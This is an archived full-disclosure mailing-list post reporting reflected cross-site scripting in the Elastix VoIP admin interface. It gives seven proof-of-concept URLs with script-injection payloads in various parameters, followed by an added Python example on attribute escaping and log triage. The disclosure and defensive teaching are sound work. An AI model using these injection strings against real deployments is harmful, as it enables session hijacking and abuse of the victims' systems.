
List:       full-disclosure
Subject:    [Full-disclosure] Fwd: xss in elastix
From:       dave b <db.pub.mail () gmail ! com>
Date:       2010-10-31 16:16:10
Message-ID: AANLkTin1tS48gKXegWWSU2HBTvBk7=t_OUSpqBxLVSXk () mail ! gmail ! com

Oh look, I think Bugtraq hates me ....
More lame XSS in yet another VoIP management user interface for Asterisk...

---------- Forwarded message ----------
From: dave b <db.pub.mail@gmail.com>
Date: 29 October 2010 03:36
Subject: xss in elastix
To: bugtraq@securityfocus.com


XSS in Elastix (http://www.elastix.org/):

1. https://10.0.20.226/index.php?menu=packages&nombre_paquete=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&submitInstalado=installed&submit_nombre=Search
2. https://10.0.20.226/?menu=pbxconfig&display=recordings&Submit=Go&display=recordings&usersnum=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
3. https://10.0.20.226/index.php?menu=cdrreport&date_end=28%20Oct%202010&date_start=28%20Oct%202010&field_name=dst&field_pattern=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&filter=Filter&status=ALL
4. https://10.0.20.226/index.php?menu=asterisk_log&filter=2010-10-28&offset=0&busqueda=&ultima_busqueda=&ultimo_offset=&&busqueda=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&filter=2010-10-28&offset=0&show=Show&ultima_busqueda=&ultimo_offset=
5. https://10.0.20.226/index.php?menu=summary_by_extension&option_fil=&value_fil=&date_from=28&date_from=28%20Oct%202010&date_to=28%20Oct%202010&option_fil=Ext&show=Show&value_fil=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
6. https://10.0.20.226/index.php?menu=grouplist&action=view&id=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
7. https://10.0.20.226/index.php?menu=group_permission&filter_group=1&filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
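
Added example, not part of the original post and not Elastix's own code: the first URL above is decoded to show why `"/>` breaks out of a value attribute, a hypothetical search-box template is rendered in the unescaped form and in the escaped form that neutralises it, and a small triage helper flags query parameters carrying markup characters for log review. The template, function names and host are assumptions made for illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample: URL 1 from the advisory, with the reporter's test host.
ADVISORY_URL = ("https://10.0.20.226/index.php?menu=packages"
                "&nombre_paquete=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E"
                "&submitInstalado=installed&submit_nombre=Search")


def reflected_param(url, name):
    """Return the decoded value of query parameter `name` (first occurrence)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get(name, [""])[0]


def render_search_box_vulnerable(value):
    """Hypothetical vulnerable pattern: the parameter is reflected into an
    HTML attribute verbatim, so a leading " closes the attribute and the
    rest of the value becomes live markup."""
    return f'<input type="text" name="nombre_paquete" value="{value}" />'


def render_search_box_fixed(value):
    """Hardened form: escape for the attribute context. quote=True turns "
    into &quot; so the value cannot terminate the attribute, and < > become
    &lt; &gt; so no tag is created."""
    return (f'<input type="text" name="nombre_paquete" '
            f'value="{html.escape(value, quote=True)}" />')


def breaks_out_of_attribute(rendered):
    """Crude output check: does a <script> tag appear as real markup?"""
    return "<script" in rendered.lower()


def suspicious_params(url):
    """Defender-side triage for access logs: names of query parameters whose
    decoded value contains characters that only matter as HTML markup."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return sorted(name for name, values in qs.items()
                  if any(c in v for v in values for c in '<>"'))


if __name__ == "__main__":
    payload = reflected_param(ADVISORY_URL, "nombre_paquete")
    print("decoded payload:", payload)
    print("vulnerable:", render_search_box_vulnerable(payload))
    print("fixed:     ", render_search_box_fixed(payload))
    print("flagged params:", suspicious_params(ADVISORY_URL))
```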


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

